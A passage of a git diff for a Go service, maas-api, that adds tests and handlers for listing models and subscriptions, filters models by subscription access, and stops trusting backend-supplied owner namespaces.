+			Version: "v1alpha1",
+			Kind:    "MaaSSubscription",
+		})
+		sub.SetName(name)
+		sub.SetNamespace(fixtures.TestNamespace)
+
+		groupSlice := make([]any, len(groups))
+		for i, g := range groups {
+			groupSlice[i] = map[string]any{"name": g}
+		}
+
+		_ = unstructured.SetNestedMap(sub.Object, map[string]any{
+			"owner": map[string]any{
+				"groups": groupSlice,
+			},
+		}, "spec")
+		return sub
+	}
+
+	subscriptionLister := &fakeSubscriptionListerWithMeta{
+		subscriptions: []*unstructured.Unstructured{
+			createSubscription("sub-a", []string{"user-group"}),
+		},
+	}
+
+	modelMgr, err := models.NewManager(testLogger)
+	require.NoError(t, err)
+
+	subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister)
+
+	config := fixtures.TestServerConfig{Objects: []runtime.Object{}}
+	router, _ := fixtures.SetupTestServer(t, config)
+
+	_, cleanup := fixtures.StubTokenProviderAPIs(t, true)
+	defer cleanup()
+
+	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
+	v1 := router.Group("/v1")
+	v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
+
+	t.Run("different MaaSModelRefs with same URL and model ID remain separate entries", func(t *testing.T) {
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		req.Header.Set("X-Maas-Return-All-Models", "true")
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["user-group"]`)
+		router.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		// Should have 2 entries because different MaaSModelRef resources (different ownedBy)
+		// even though they have the same URL and model ID
+		assert.Len(t, response.Data, 2, "Different MaaSModelRef resources should remain separate entries")
+
+		// Both should have model ID "gpt-4" and same URL but different ownedBy
+		for _, model := range response.Data {
+			assert.Equal(t, "gpt-4", model.ID)
+			assert.Equal(t, sharedModelServer.URL, model.URL.String())
+			require.Len(t, model.Subscriptions, 1, "Each model should have 1 subscription")
+			assert.Equal(t, "sub-a", model.Subscriptions[0].Name)
+			// OwnedBy should be either namespace-a/gpt-4-ref or namespace-b/gpt-4-another-ref
+			assert.Contains(t, []string{"namespace-a/gpt-4-ref", "namespace-b/gpt-4-another-ref"}, model.OwnedBy)
+		}
+	})
+}
+
+func TestListModels_DifferentModelRefsWithSameModelIDAndDifferentSubscriptions(t *testing.T) {
+	testLogger := logger.Development()
+
+	// Create two mock servers that both return the same model ID "gpt-4"
+	// One accessible via sub-a, one via sub-b
+	// Use bare subscription names to match what Authorino injects from API key validation
+	modelServerA := createMockModelServerWithSubscriptionCheck(t, "gpt-4", "sub-a")
+	modelServerB := createMockModelServerWithSubscriptionCheck(t, "gpt-4", "sub-b")
+
+	// Setup MaaSModelRef lister with two different MaaSModelRefs in different namespaces
+	lister := fakeMaaSModelRefLister{
+		"namespace-a": []*unstructured.Unstructured{
+			maasModelRefUnstructured("gpt-4-ref", "namespace-a", modelServerA.URL, true, nil),
+		},
+		"namespace-b": []*unstructured.Unstructured{
+			maasModelRefUnstructured("gpt-4-ref", "namespace-b", modelServerB.URL, true, nil),
+		},
+	}
+
+	// Setup two subscriptions
+	createSubscription := func(name string, groups []string) *unstructured.Unstructured {
+		sub := &unstructured.Unstructured{}
+		sub.SetGroupVersionKind(schema.GroupVersionKind{
+			Group:   "maas.opendatahub.io",
+			Version: "v1alpha1",
+			Kind:    "MaaSSubscription",
+		})
+		sub.SetName(name)
+		sub.SetNamespace(fixtures.TestNamespace)
+
+		groupSlice := make([]any, len(groups))
+		for i, g := range groups {
+			groupSlice[i] = map[string]any{"name": g}
+		}
+
+		_ = unstructured.SetNestedMap(sub.Object, map[string]any{
+			"owner": map[string]any{
+				"groups": groupSlice,
+			},
+		}, "spec")
+		return sub
+	}
+
+	subscriptionLister := &fakeSubscriptionListerWithMeta{
+		subscriptions: []*unstructured.Unstructured{
+			createSubscription("sub-a", []string{"user-group"}),
+			createSubscription("sub-b", []string{"user-group"}),
+		},
+	}
+
+	modelMgr, err := models.NewManager(testLogger)
+	require.NoError(t, err)
+
+	subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister)
+
+	config := fixtures.TestServerConfig{Objects: []runtime.Object{}}
+	router, _ := fixtures.SetupTestServer(t, config)
+
+	_, cleanup := fixtures.StubTokenProviderAPIs(t, true)
+	defer cleanup()
+
+	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
+	v1 := router.Group("/v1")
+	v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
+
+	t.Run("different MaaSModelRefs with same model ID but different URLs return separate entries", func(t *testing.T) {
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		req.Header.Set("X-Maas-Return-All-Models", "true")
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["user-group"]`)
+		router.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		// Should have 2 entries because URLs are different (even though model ID is same)
+		assert.Len(t, response.Data, 2, "Different URLs should create separate entries even with same model ID")
+
+		// Both should have model ID "gpt-4" but different URLs and subscriptions
+		modelsByURL := make(map[string]models.Model)
+		for _, model := range response.Data {
+			assert.Equal(t, "gpt-4", model.ID, "Both entries should have model ID gpt-4")
+			require.Len(t, model.Subscriptions, 1, "Each model should have exactly 1 subscription")
+			modelsByURL[model.URL.String()] = model
+		}
+
+		// Verify we have 2 different URLs
+		assert.Len(t, modelsByURL, 2, "Should have 2 different URLs")
+
+		// Verify each has the correct subscription
+		subscriptionNames := make(map[string]bool)
+		for _, model := range response.Data {
+			subscriptionNames[model.Subscriptions[0].Name] = true
+		}
+		assert.True(t, subscriptionNames["sub-a"], "Should have model with sub-a")
+		assert.True(t, subscriptionNames["sub-b"], "Should have model with sub-b")
+	})
+}
diff --git a/maas-api/internal/models/discovery.go b/maas-api/internal/models/discovery.go
index c4a454cdb..411b16d49 100644
--- a/maas-api/internal/models/discovery.go
+++ b/maas-api/internal/models/discovery.go
@@ -72,7 +72,8 @@ func (m *Manager) FilterModelsByAccess(ctx context.Context, models []Model, auth
 		return models
 	}
 	m.logger.Debug("FilterModelsByAccess: validating access for models", "count", len(models), "subscriptionHeaderProvided", subscriptionHeader != "")
-	var out []Model
+	// Initialize to empty slice (not nil) so JSON marshals as [] instead of null when no models are accessible
+	out := []Model{}
 	var mu sync.Mutex
 	g, ctx := errgroup.WithContext(ctx)
 	g.SetLimit(maxDiscoveryConcurrency)
@@ -140,10 +141,8 @@ func discoveredToModels(discovered []openai.Model, original Model) []Model {
 		if d.ID == "" {
 			continue
 		}
-		ownedBy := d.OwnedBy
-		if ownedBy == "" {
-			ownedBy = original.OwnedBy
-		}
+		// Always use the trusted namespace from MaaSModelRef (original.OwnedBy)
+		// Never trust backend-returned OwnedBy to prevent namespace spoofing
 		created := d.Created
 		if created == 0 {
 			created = original.Created
@@ -153,7 +152,7 @@ func discoveredToModels(discovered []openai.Model, original Model) []Model {
 				ID:      d.ID,
 				Object:  "model",
 				Created: created,
-				OwnedBy: ownedBy,
+				OwnedBy: original.OwnedBy,
 			},
 			Kind:    original.Kind,
 			URL:     original.URL,
diff --git a/maas-api/internal/models/maasmodelref.go b/maas-api/internal/models/maasmodelref.go
index 19b7ae17f..d463d6cf3 100644
--- a/maas-api/internal/models/maasmodelref.go
+++ b/maas-api/internal/models/maasmodelref.go
@@ -7,6 +7,8 @@ import (
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/runtime/schema"
 	"knative.dev/pkg/apis"
+
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/constant"
 )
 
 const (
@@ -17,16 +19,16 @@ const (
 
 // MaaSModelRefLister lists MaaSModelRef CRs from a cache (e.g. informer-backed). Used for GET /v1/models.
 type MaaSModelRefLister interface {
-	// List returns MaaSModelRef unstructured items in the given namespace.
-	List(namespace string) ([]*unstructured.Unstructured, error)
+	// List returns all MaaSModelRef unstructured items from all namespaces.
+	List() ([]*unstructured.Unstructured, error)
 }
 
 // ListFromMaaSModelRefLister converts cached MaaSModelRef items to API models. Uses status.endpoint and status.phase.
-func ListFromMaaSModelRefLister(lister MaaSModelRefLister, namespace string) ([]Model, error) {
-	if lister == nil || namespace == "" {
+func ListFromMaaSModelRefLister(lister MaaSModelRefLister) ([]Model, error) {
+	if lister == nil {
 		return nil, nil
 	}
-	items, err := lister.List(namespace)
+	items, err := lister.List()
 	if err != nil {
 		return nil, err
 	}
@@ -58,6 +60,19 @@ func maasModelRefToModel(u *unstructured.Unstructured) *Model {
 	if kind == "" {
 		kind = "llmisvc"
 	}
+	annotations := u.GetAnnotations()
+	var details *Details
+	if annotations != nil {
+		d := Details{
+			DisplayName:   annotations[constant.AnnotationDisplayName],
+			Description:   annotations[constant.AnnotationDescription],
+			GenAIUseCase:  annotations[constant.AnnotationGenAIUseCase],
+			ContextWindow: annotations[constant.AnnotationContextWindow],
+		}
+		if d.DisplayName != "" || d.Description != "" || d.GenAIUseCase != "" || d.ContextWindow != "" {
+			details = &d
+		}
+	}
 
 	var urlPtr *apis.URL
 	if endpoint != "" {
@@ -72,15 +87,19 @@ func maasModelRefToModel(u *unstructured.Unstructured) *Model {
 		created = t.Unix()
 	}
 
+	namespace := u.GetNamespace()
+	// OwnedBy includes both namespace and MaaSModelRef name for dashboard display
+	ownedBy := namespace + "/" + name
 	return &Model{
 		Model: openai.Model{
 			ID:      name,
 			Object:  "model",
 			Created: created,
-			OwnedBy: u.GetNamespace(),
+			OwnedBy: ownedBy,
 		},
-		Kind:  kind,
-		URL:   urlPtr,
-		Ready: ready,
+		Kind:    kind,
+		URL:     urlPtr,
+		Ready:   ready,
+		Details: details,
 	}
 }
diff --git a/maas-api/internal/models/types.go b/maas-api/internal/models/types.go
index 20e678a26..a66574de0 100644
--- a/maas-api/internal/models/types.go
+++ b/maas-api/internal/models/types.go
@@ -12,9 +12,17 @@ import (
 
 // Details contains additional metadata from LLMInferenceService annotations.
 type Details struct {
-	GenAIUseCase string `json:"genaiUseCase,omitempty"`
-	Description  string `json:"description,omitempty"`
-	DisplayName  string `json:"displayName,omitempty"`
+	GenAIUseCase  string `json:"genaiUseCase,omitempty"`
+	Description   string `json:"description,omitempty"`
+	DisplayName   string `json:"displayName,omitempty"`
+	ContextWindow string `json:"contextWindow,omitempty"`
+}
+
+// SubscriptionInfo contains metadata about which subscription provides access to a model.
+type SubscriptionInfo struct {
+	Name        string `json:"name"`
+	DisplayName string `json:"displayName,omitempty"`
+	Description string `json:"description,omitempty"`
 }
 
 // Model extends openai.Model with additional fields.
@@ -28,11 +36,12 @@ type Model struct {
 
 	// Kind is the model reference kind (e.g. "llmisvc" from MaaSModelRef spec.modelRef.kind).
 	// Used when validating access; default is "llmisvc" if unset.
-	Kind    string    `json:"kind,omitempty"`
-	URL     *apis.URL `json:"url,omitempty"`
-	Ready   bool      `json:"ready"`
-	Details *Details  `json:"modelDetails,omitempty"`
-	Aliases []string  `json:"aliases,omitempty"`
+	Kind          string             `json:"kind,omitempty"`
+	URL           *apis.URL          `json:"url,omitempty"`
+	Ready         bool               `json:"ready"`
+	Details       *Details           `json:"modelDetails,omitempty"`
+	Aliases       []string           `json:"aliases,omitempty"`
+	Subscriptions []SubscriptionInfo `json:"subscriptions,omitempty"` // Subscriptions providing access to this model
 }
 
 // UnmarshalJSON implements custom JSON unmarshalling to work around openai.Model's
diff --git a/maas-api/internal/subscription/handler.go b/maas-api/internal/subscription/handler.go
index c79f11662..b62d13240 100644
--- a/maas-api/internal/subscription/handler.go
+++ b/maas-api/internal/subscription/handler.go
@@ -7,6 +7,7 @@ import (
 	"github.com/gin-gonic/gin"
 
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/token"
 )
 
 // Handler handles subscription selection requests.
@@ -26,7 +27,7 @@ func NewHandler(log *logger.Logger, selector *Selector) *Handler {
 	}
 }
 
-// SelectSubscription handles POST /v1/subscriptions/select requests.
+// SelectSubscription handles POST /internal/v1/subscriptions/select requests.
 //
 // This endpoint is called by Authorino during AuthPolicy evaluation to determine
 // which subscription a user should be assigned to. The request contains authenticated
@@ -63,14 +64,16 @@ func (h *Handler) SelectSubscription(c *gin.Context) {
 		"username", req.Username,
 		"groups", req.Groups,
 		"requestedSubscription", req.RequestedSubscription,
+		"requestedModel", req.RequestedModel,
 	)
 
-	response, err := h.selector.Select(req.Groups, req.Username, req.RequestedSubscription)
+	response, err := h.selector.Select(req.Groups, req.Username, req.RequestedSubscription, req.RequestedModel)
 	if err != nil {
 		var noSubErr *NoSubscriptionError
 		var notFoundErr *SubscriptionNotFoundError
 		var accessDeniedErr *AccessDeniedError
 		var multipleSubsErr *MultipleSubscriptionsError
+		var modelNotInSubErr *ModelNotInSubscriptionError
 
 		if errors.As(err, &noSubErr) {
 			h.logger.Debug("No subscription found for user",
@@ -119,6 +122,18 @@ func (h *Handler) SelectSubscription(c *gin.Context) {
 			return
 		}
 
+		if errors.As(err, &modelNotInSubErr) {
+			h.logger.Debug("Model not included in subscription",
+				"subscription", modelNotInSubErr.Subscription,
+				"model", modelNotInSubErr.Model,
+			)
+			c.JSON(http.StatusOK, SelectResponse{
+				Error:   "model_not_in_subscription",
+				Message: err.Error(),
+			})
+			return
+		}
+
 		// All other errors are internal server errors
 		h.logger.Error("Subscription selection failed",
 			"error", err.Error(),
@@ -138,3 +153,94 @@ func (h *Handler) SelectSubscription(c *gin.Context) {
 	)
 	c.JSON(http.StatusOK, response)
 }
+
+// ListSubscriptions handles GET /v1/subscriptions.
+// Returns all subscriptions the authenticated user has access to.
+func (h *Handler) ListSubscriptions(c *gin.Context) {
+	userContextVal, exists := c.Get("user")
+	if !exists {
+		h.logger.Error("User context not found - ExtractUserInfo middleware not called")
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Internal server error",
+				"type":    "server_error",
+			}})
+		return
+	}
+	userContext, ok := userContextVal.(*token.UserContext)
+	if !ok {
+		h.logger.Error("Invalid user context type")
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Internal server error",
+				"type":    "server_error",
+			}})
+		return
+	}
+
+	accessible, err := h.selector.GetAllAccessible(userContext.Groups, userContext.Username)
+	if err != nil {
+		h.logger.Error("Failed to list subscriptions", "error", err)
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Failed to list subscriptions",
+				"type":    "server_error",
+			}})
+		return
+	}
+
+	subs := make([]SubscriptionInfo, len(accessible))
+	for i, sub := range accessible {
+		subs[i] = ResponseToSubscriptionInfo(sub)
+	}
+
+	c.JSON(http.StatusOK, subs)
+}
+
+// ListSubscriptionsForModel handles GET /v1/model/:model-id/subscriptions.
+// Returns subscriptions the user has access to that include the specified model.
+func (h *Handler) ListSubscriptionsForModel(c *gin.Context) {
+	userContextVal, exists := c.Get("user")
+	if !exists {
+		h.logger.Error("User context not found - ExtractUserInfo middleware not called")
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Internal server error",
+				"type":    "server_error",
+			}})
+		return
+	}
+	userContext, ok := userContextVal.(*token.UserContext)
+	if !ok {
+		h.logger.Error("Invalid user context type")
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Internal server error",
+				"type":    "server_error",
+			}})
+		return
+	}
+
+	modelID := c.Param("model-id")
+	if modelID == "" {
+		c.JSON(http.StatusBadRequest, gin.H{
+			"error": gin.H{
+				"message": "model-id is required",
+				"type":    "invalid_request_error",
+			}})
+		return
+	}
+
+	subs, err := h.selector.ListAccessibleForModel(userContext.Username, userContext.Groups, modelID)
+	if err != nil {
+		h.logger.Error("Failed to list subscriptions for model", "error", err, "model", modelID)
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Failed to list subscriptions",
+				"type":    "server_error",
+			}})
+		return
+	}
+
+	c.JSON(http.StatusOK, subs)
+}
diff --git a/maas-api/internal/subscription/handler_test.go b/maas-api/internal/subscription/handler_test.go
index 6102c7c79..3bdb679c6 100644
--- a/maas-api/internal/subscription/handler_test.go
+++ b/maas-api/internal/subscription/handler_test.go
@@ -12,6 +12,7 @@ import (
 
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/token"
 )
 
 // mockLister implements subscription.Lister for testing.
@@ -47,7 +48,8 @@ func createTestSubscription(name string, groups []string, priority int32, orgID,
 						"name": "test-model",
 						"tokenRateLimits": []any{
 							map[string]any{
-								"limit": int64(1000),
+								"limit":  int64(1000),
+								"window": "1m",
 							},
 						},
 					},
@@ -206,34 +208,45 @@ func TestHandler_SelectSubscription_AccessDenied(t *testing.T) {
 	lister := &mockLister{subscriptions: subscriptions}
 	router := setupTestRouter(lister)
 
-	reqBody := subscription.SelectRequest{
-		Groups:                []string{"basic-users"},
-		Username:              "alice",
-		RequestedSubscription: "premium-sub", // Alice doesn't have access
-	}
-	jsonBody, err := json.Marshal(reqBody)
-	if err != nil {
-		t.Fatalf("failed to marshal request: %v", err)
+	testAccessDenied := func(t *testing.T, requestedSubscription, expectedError string) {
+		t.Helper()
+		reqBody := subscription.SelectRequest{
+			Groups:                []string{"basic-users"},
+			Username:              "alice",
+			RequestedSubscription: requestedSubscription,
+		}
+		jsonBody, err := json.Marshal(reqBody)
+		if err != nil {
+			t.Fatalf("failed to marshal request: %v", err)
+		}
+
+		req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody))
+		req.Header.Set("Content-Type", "application/json")
+		w := httptest.NewRecorder()
+
+		router.ServeHTTP(w, req)
+
+		if w.Code != http.StatusOK {
+			t.Errorf("expected status 200, got %d", w.Code)
+		}
+
+		var response subscription.SelectResponse
+		if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
+			t.Fatalf("failed to unmarshal response: %v", err)
+		}
+
+		if response.Error != expectedError {
+			t.Errorf("expected error code %q, got %q", expectedError, response.Error)
+		}
 	}
 
-	req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody))
-	req.Header.Set("Content-Type", "application/json")
-	w := httptest.NewRecorder()
-
-	router.ServeHTTP(w, req)
+	t.Run("bare name without access returns access_denied", func(t *testing.T) {
+		testAccessDenied(t, "premium-sub", "access_denied")
+	})
 
-	if w.Code != http.StatusOK {
-		t.Errorf("expected status 200, got %d", w.Code)
-	}
-
-	var response subscription.SelectResponse
-	if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
-		t.Fatalf("failed to unmarshal response: %v", err)
-	}
-
-	if response.Error != "access_denied" {
-		t.Errorf("expected error code 'access_denied', got %q", response.Error)
-	}
+	t.Run("qualified name without access returns access_denied", func(t *testing.T) {
+		testAccessDenied(t, "test-ns/premium-sub", "access_denied")
+	})
 }
 
 func TestHandler_SelectSubscription_InvalidRequest(t *testing.T) {
@@ -280,7 +293,8 @@ func TestHandler_SelectSubscription_UserWithoutGroups(t *testing.T) {
 						"name": "test-model",
 						"tokenRateLimits": []any{
 							map[string]any{
-								"limit": int64(1000),
+								"limit":  int64(1000),
+								"window": "1m",
 							},
 						},
 					},
@@ -556,3 +570,620 @@ func TestHandler_SelectSubscription_MultipleSubscriptions(t *testing.T) {
 		})
 	}
 }
+
+// createTestSubscriptionWithModels creates a subscription with specific model references.
+// All test subscriptions use "tenant-a" namespace.
+func createTestSubscriptionWithModels(
+	name string, groups []string,
+	models []struct{ ns, name string },
+	priority int32, orgID, costCenter string,
+) *unstructured.Unstructured {
+	groupsSlice := make([]any, len(groups))
+	for i, g := range groups {
+		groupsSlice[i] = map[string]any{"name": g}
+	}
+
+	modelRefsSlice := make([]any, len(models))
+	for i, m := range models {
+		modelRefsSlice[i] = map[string]any{
+			"namespace": m.ns,
+			"name":      m.name,
+			"tokenRateLimits": []any{
+				map[string]any{
+					"limit":  int64(1000),
+					"window": "1m",
+				},
+			},
+		}
+	}
+
+	return &unstructured.Unstructured{
+		Object: map[string]any{
+			"apiVersion": "maas.opendatahub.io/v1alpha1",
+			"kind":       "MaaSSubscription",
+			"metadata": map[string]any{
+				"name":      name,
+				"namespace": "tenant-a",
+			},
+			"spec": map[string]any{
+				"owner": map[string]any{
+					"groups": groupsSlice,
+				},
+				"priority":  int64(priority),
+				"modelRefs": modelRefsSlice,
+				"tokenMetadata": map[string]any{
+					"organizationId": orgID,
+					"costCenter":     costCenter,
+					"labels": map[string]any{
+						"env": "test",
+					},
+				},
+			},
+		},
+	}
+}
+
+// --- Subscription && /v1/model/:model-id/subscriptions endpoints tests ---
+
+func createTestSubscriptionWithAnnotations(name string, groups []string, modelNames []string, annotations map[string]string) *unstructured.Unstructured {
+	groupsSlice := make([]any, len(groups))
+	for i, g := range groups {
+		groupsSlice[i] = map[string]any{"name": g}
+	}
+
+	modelRefs := make([]any, len(modelNames))
+	for i, m := range modelNames {
+		modelRefs[i] = map[string]any{
+			"name": m,
+			"tokenRateLimits": []any{
+				map[string]any{"limit": int64(1000), "window": "1m"},
+			},
+		}
+	}
+
+	metadata := map[string]any{
+		"name":      name,
+		"namespace": "test-ns",
+	}
+	if len(annotations) > 0 {
+		annMap := make(map[string]any, len(annotations))
+		for k, v := range annotations {
+			annMap[k] = v
+		}
+		metadata["annotations"] = annMap
+	}
+
+	return &unstructured.Unstructured{
+		Object: map[string]any{
+			"apiVersion": "maas.opendatahub.io/v1alpha1",
+			"kind":       "MaaSSubscription",
+			"metadata":   metadata,
+			"spec": map[string]any{
+				"owner": map[string]any{
+					"groups": groupsSlice,
+				},
+				"priority":  int64(10),
+				"modelRefs": modelRefs,
+			},
+		},
+	}
+}
+
+// runSelectSubscriptionTest executes a subscription selection test case.
+func runSelectSubscriptionTest(
+	t *testing.T, router *gin.Engine,
+	groups []string, username, requestedSubscription, requestedModel string,
+	expectedName, expectedError, description string,
+) {
+	t.Helper()
+
+	reqBody := subscription.SelectRequest{
+		Groups:                groups,
+		Username:              username,
+		RequestedSubscription: requestedSubscription,
+		RequestedModel:        requestedModel,
+	}
+	jsonBody, err := json.Marshal(reqBody)
+	if err != nil {
+		t.Fatalf("failed to marshal request: %v", err)
+	}
+
+	req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("%s: expected status 200, got %d", description, w.Code)
+	}
+
+	var response subscription.SelectResponse
+	if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if expectedError != "" {
+		// Expecting an error response
+		if response.Error != expectedError {
+			t.Errorf("%s: expected error code %q, got %q. Message: %s", description, expectedError, response.Error, response.Message)
+		}
+	} else {
+		// Expecting a success response
+		if response.Name != expectedName {
+			t.Errorf("%s: expected subscription %q, got %q", description, expectedName, response.Name)
+		}
+	}
+}
+
+// TestHandler_SelectSubscription_ModelBasedAutoSelection tests auto-selection based on model availability.
+func TestHandler_SelectSubscription_ModelBasedAutoSelection(t *testing.T) {
+	// Create subscriptions with different models
+	subscriptions := []*unstructured.Unstructured{
+		createTestSubscriptionWithModels("gold", []string{"premium-users"}, []struct{ ns, name string }{
+			{ns: "models", name: "llm"},
+			{ns: "models", name: "embedding"},
+		}, 10, "org-gold", "cc-gold"),
+		createTestSubscriptionWithModels("silver", []string{"premium-users"}, []struct{ ns, name string }{
+			{ns: "models", name: "small-model"},
+		}, 10, "org-silver", "cc-silver"),
+	}
+
+	lister := &mockLister{subscriptions: subscriptions}
+	router := setupTestRouter(lister)
+
+	tests := []struct {
+		name           string
+		groups         []string
+		username       string
+		requestedModel string
+		expectedName   string
+		expectedError  string
+		description    string
+	}{
+		{
+			name:           "auto-select when only gold has llm model",
+			groups:         []string{"premium-users"},
+			username:       "alice",
+			requestedModel: "models/llm",
+			expectedName:   "gold",
+			description:    "User has access to both gold and silver, but only gold has models/llm. Should auto-select gold.",
+		},
+		{
+			name:           "auto-select when only silver has small-model",
+			groups:         []string{"premium-users"},
+			username:       "alice",
+			requestedModel: "models/small-model",
+			expectedName:   "silver",
+			description:    "User has access to both gold and silver, but only silver has models/small-model. Should auto-select silver.",
+		},
+		{
+			name:           "auto-select when only gold has embedding model",
+			groups:         []string{"premium-users"},
+			username:       "alice",
+			requestedModel: "models/embedding",
+			expectedName:   "gold",
+			description:    "User has access to both gold and silver, but only gold has models/embedding. Should auto-select gold.",
+		},
+		{
+			name:           "error when no subscription has the requested model",
+			groups:         []string{"premium-users"},
+			username:       "alice",
+			requestedModel: "models/nonexistent",
+			expectedError:  "not_found",
+			description:    "User has access to gold and silver, but neither has models/nonexistent. Should return not_found error.",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			reqBody := subscription.SelectRequest{
+				Groups:         tt.groups,
+				Username:       tt.username,
+				RequestedModel: tt.requestedModel,
+			}
+			jsonBody, err := json.Marshal(reqBody)
+			if err != nil {
+				t.Fatalf("failed to marshal request: %v", err)
+			}
+
+			req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody))
+			req.Header.Set("Content-Type", "application/json")
+			w := httptest.NewRecorder()
+
+			router.ServeHTTP(w, req)
+
+			if w.Code != http.StatusOK {
+				t.Errorf("%s: expected status 200, got %d", tt.description, w.Code)
+			}
+
+			var response subscription.SelectResponse
+			if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
+				t.Fatalf("failed to unmarshal response: %v", err)
+			}
+
+			if tt.expectedError != "" {
+				// Expecting an error response
+				if response.Error != tt.expectedError {
+					t.Errorf("%s: expected error code %q, got %q", tt.description, tt.expectedError, response.Error)
+				}
+			} else {
+				// Expecting a success response
+				if response.Name != tt.expectedName {
+					t.Errorf("%s: expected subscription %q, got %q", tt.description, tt.expectedName, response.Name)
+				}
+			}
+		})
+	}
+}
+
+// TestHandler_SelectSubscription_ModelValidation tests that explicit subscription selection validates model access.
+func TestHandler_SelectSubscription_ModelValidation(t *testing.T) {
+	// Create subscriptions with different models
+	subscriptions := []*unstructured.Unstructured{
+		createTestSubscriptionWithModels("gold", []string{"premium-users"}, []struct{ ns, name string }{
+			{ns: "models", name: "llm"},
+		}, 10, "org-gold", "cc-gold"),
+		createTestSubscriptionWithModels("silver", []string{"premium-users"}, []struct{ ns, name string }{
+			{ns: "models", name: "small-model"},
+		}, 10, "org-silver", "cc-silver"),
+	}
+
+	lister := &mockLister{subscriptions: subscriptions}
+	router := setupTestRouter(lister)
+
+	tests := []struct {
+		name                  string
+		groups                []string
+		username              string
+		requestedSubscription string
+		requestedModel        string
+		expectedName          string
+		expectedError         string
+		description           string
+	}{
+		{
+			name:                  "explicit selection with correct model",
+			groups:                []string{"premium-users"},
+			username:              "alice",
+			requestedSubscription: "gold",
+			requestedModel:        "models/llm",
+			expectedName:          "gold",
+			description:           "User explicitly selects gold subscription which has models/llm. Should succeed.",
+		},
+		{
+			name:                  "explicit selection with wrong model",
+			groups:                []string{"premium-users"},
+			username:              "alice",
+			requestedSubscription: "silver",
+			requestedModel:        "models/llm",
+			expectedError:         "model_not_in_subscription",
+			description:           "User explicitly selects silver subscription but it doesn't have models/llm. Should return model_not_in_subscription error.",
+		},
+		{
+			name:                  "explicit selection gold with small-model",
+			groups:                []string{"premium-users"},
+			username:              "alice",
+			requestedSubscription: "gold",
+			requestedModel:        "models/small-model",
+			expectedError:         "model_not_in_subscription",
+			description:           "User explicitly selects gold subscription but it doesn't have models/small-model. Should return model_not_in_subscription error.",
+		},
+		{
+			name:                  "explicit selection silver with small-model",
+			groups:                []string{"premium-users"},
+			username:              "alice",
+			requestedSubscription: "silver",
+			requestedModel:        "models/small-model",
+			expectedName:          "silver",
+			description:           "User explicitly selects silver subscription which has models/small-model. Should succeed.",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			runSelectSubscriptionTest(
+				t, router,
+				tt.groups, tt.username, tt.requestedSubscription, tt.requestedModel,
+				tt.expectedName, tt.expectedError, tt.description,
+			)
+		})
+	}
+}
+
+// TestHandler_SelectSubscription_MultipleSubscriptionsSameModel tests behavior when multiple subscriptions have the same model.
+func TestHandler_SelectSubscription_MultipleSubscriptionsSameModel(t *testing.T) {
+	// Create two subscriptions that both have the same model
+	subscriptions := []*unstructured.Unstructured{
+		createTestSubscriptionWithModels("gold", []string{"premium-users"}, []struct{ ns, name string }{
+			{ns: "models", name: "llm"},
+		}, 10, "org-gold", "cc-gold"),
+		createTestSubscriptionWithModels("platinum", []string{"premium-users"}, []struct{ ns, name string }{
+			{ns: "models", name: "llm"},
+		}, 20, "org-platinum", "cc-platinum"),
+	}
+
